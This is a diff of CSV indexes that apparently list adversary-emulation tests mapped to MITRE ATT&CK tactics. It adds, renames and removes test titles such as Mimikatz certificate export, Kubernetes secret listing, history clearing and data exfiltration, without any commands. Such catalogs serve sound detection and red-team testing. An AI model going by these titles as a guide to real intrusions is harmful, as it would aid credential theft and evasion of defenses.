@@ -2,8 +2,7 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,1,AWS - CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
-defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS - CloudWatch Log Stream Deletes,89422c87-b57b-4a04-a12a-802bb11d06121,sh
-defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
+defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
 credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
@@ -225,6 +225,8 @@ defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applic
 defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
 defense-evasion,T1112,Modify Registry,45,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
 defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
+defense-evasion,T1112,Modify Registry,47,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
+defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
@@ -244,6 +246,8 @@ defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
+defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
+defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
 defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
 defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
@@ -339,6 +343,11 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Lockbit Bl
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,38,Delete Windows Defender Scheduled Tasks,4b841aa1-0d05-4b32-bbe7-7564346e7c76,command_prompt
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,39,Clear History,23b88394-091b-4968-a42d-fb8076992443,sh
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,40,Suspend History,94f6a1c9-aae7-46a4-9083-2bb1f5768ec4,sh
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Reboot Linux Host via Kernel System Request,6d6d3154-1a52-4d1a-9d51-92ab8148b32e,sh
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
@@ -394,8 +403,7 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,4,AWS - Disable Cl
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,5,AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus,22d89a2f-d475-4895-b2d4-68626d49c029,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,6,AWS - Remove VPC Flow Logs using Stratus,93c150f5-ad7b-4ee3-8992-df06dec2ac79,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
-defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS - CloudWatch Log Stream Deletes,89422c87-b57b-4a04-a12a-802bb11d06121,sh
-defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,9,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
+defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
 defense-evasion,T1564.003,Hide Artifacts: Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1027.006,HTML Smuggling,1,HTML Smuggling Remote Payload,30cbeda4-08d9-42f1-8685-197fad677734,powershell
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
@@ -537,6 +545,8 @@ privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Set
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
 privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
+privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
+privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
@@ -595,6 +605,9 @@ privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using
 privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
+privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
+privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,4,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
+privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,5,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
 privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
 privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
 privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
@@ -713,6 +726,12 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Inter
 execution,T1059.004,Command and Scripting Interpreter: Bash,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,5,New script file in the tmp directory,8cd1947b-4a54-41fb-b5ea-07d0ace04f81,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is running,7b38e5cc-47be-44f0-a425-390305c76c17,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
+execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
 execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
@@ -844,11 +863,11 @@ persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM use
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
-persistence,T1098,Account Manipulation,4,Azure - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
-persistence,T1098,Account Manipulation,5,Azure - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
+persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
+persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
 persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
 persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
-persistence,T1098,Account Manipulation,8,AzureAD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
+persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
 persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
 persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
 persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,2,MacOS - Load Kernel Module via kextload and kmutil,f4391089-d3a5-4dd1-ab22-0419527f2672,bash
@@ -863,6 +882,9 @@ persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandPr
 persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
 persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
+persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
+persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,4,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
+persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,5,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
 persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
 persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
@@ -1065,6 +1087,10 @@ credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private S
 credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
 credential-access,T1552.004,Unsecured Credentials: Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
 credential-access,T1552.004,Unsecured Credentials: Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
+credential-access,T1552.004,Unsecured Credentials: Private Keys,8,CertUtil ExportPFX,336b25bf-4514-4684-8924-474974f28137,powershell
+credential-access,T1552.004,Unsecured Credentials: Private Keys,9,Export Root Certificate with Export-PFXCertificate,7617f689-bbd8-44bc-adcd-6f8968897848,powershell
+credential-access,T1552.004,Unsecured Credentials: Private Keys,10,Export Root Certificate with Export-Certificate,78b274f8-acb0-428b-b1f7-7b0d0e73330a,powershell
+credential-access,T1552.004,Unsecured Credentials: Private Keys,11,Export Certificates with Mimikatz,290df60e-4b5d-4a5e-b0c7-dc5348ea0c86,command_prompt
 credential-access,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
 credential-access,T1003.001,OS Credential Dumping: LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
 credential-access,T1003.001,OS Credential Dumping: LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
@@ -1137,13 +1163,15 @@ credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,7,Win
 credential-access,T1003.006,OS Credential Dumping: DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
 credential-access,T1003.006,OS Credential Dumping: DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
 credential-access,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
-credential-access,T1552.007,Kubernetes List Secrets,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
-credential-access,T1552.007,Kubernetes List Secrets,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
+credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
+credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
+credential-access,T1552.007,Kubernetes List Secrets,3,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
 discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
 discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
 discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
+discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
 discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
 discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
 discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
@@ -1165,6 +1193,7 @@ discovery,T1087.002,Account Discovery: Domain Account,13,Enumerate Linked Polici
 discovery,T1087.002,Account Discovery: Domain Account,14,Enumerate Root Domain linked policies Discovery,00c652e2-0750-4ca6-82ff-0204684a6fe4,powershell
 discovery,T1087.002,Account Discovery: Domain Account,15,WinPwn - generaldomaininfo,ce483c35-c74b-45a7-a670-631d1e69db3d,powershell
 discovery,T1087.002,Account Discovery: Domain Account,16,Kerbrute - userenum,f450461c-18d1-4452-9f0d-2c42c3f08624,powershell
+discovery,T1087.002,Account Discovery: Domain Account,17,Wevtutil - Discover NTLM Users Remote,b8a563d4-a836-4993-a74e-0a19b8481bfe,powershell
 discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
 discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
 discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
@@ -1303,6 +1332,10 @@ discovery,T1201,Password Policy Discovery,10,Use of SecEdit.exe to export the lo
 discovery,T1201,Password Policy Discovery,11,Examine AWS Password Policy,15330820-d405-450b-bd08-16b5be5be9f4,sh
 discovery,T1614.001,System Location Discovery: System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
 discovery,T1614.001,System Location Discovery: System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
+discovery,T1614.001,System Location Discovery: System Language Discovery,3,Discover System Language with locale,837d609b-845e-4519-90ce-edc3b4b0e138,sh
+discovery,T1614.001,System Location Discovery: System Language Discovery,4,Discover System Language with localectl,07ce871a-b3c3-44a3-97fa-a20118fdc7c9,sh
+discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
+discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
 discovery,T1012,Query Registry,2,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
 discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
@@ -1350,6 +1383,7 @@ discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26
 discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
 discovery,T1124,System Time Discovery,3,System Time Discovery in macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
 discovery,T1124,System Time Discovery,4,System Time Discovery W32tm as a Delay,d5d5a6b0-0f92-42d8-985d-47aafa2dd4db,command_prompt
+discovery,T1124,System Time Discovery,5,System Time with Windows time Command,53ead5db-7098-4111-bb3f-563be390e72e,command_prompt
 command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1132.001,Data Encoding: Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query Volume,1700f5d6-5a44-487b-84de-bc66f507b0a6,powershell
@@ -1428,6 +1462,7 @@ impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a
 impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
 impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
 impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
+impact,T1486,Data Encrypted for Impact,6,Data Encrypted with GPG4Win,4541e2c2-33c8-44b1-be79-9161440f1718,powershell
 impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
 impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
 impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
@@ -1463,7 +1498,6 @@ initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account w
 initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
 initial-access,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
-exfiltration,T1567,Exfiltration Over Web Service,1,Data Exfiltration with ConfigSecurityPolicy,5568a8f4-a8b1-4c40-9399-4969b642f122,powershell
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
@@ -1480,3 +1514,4 @@ exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,7,Exfiltration Over Alternative Protocol - FTP - Rclone,b854eb97-bf9b-45ab-a1b5-b94e4880c56b,powershell
+exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,8,Python3 http.server,3ea1f938-f80a-4305-9aa8-431bc4867313,sh
@@ -58,6 +58,8 @@ defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
+defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
+defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
@@ -66,6 +68,11 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable sys
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,39,Clear History,23b88394-091b-4968-a42d-fb8076992443,sh
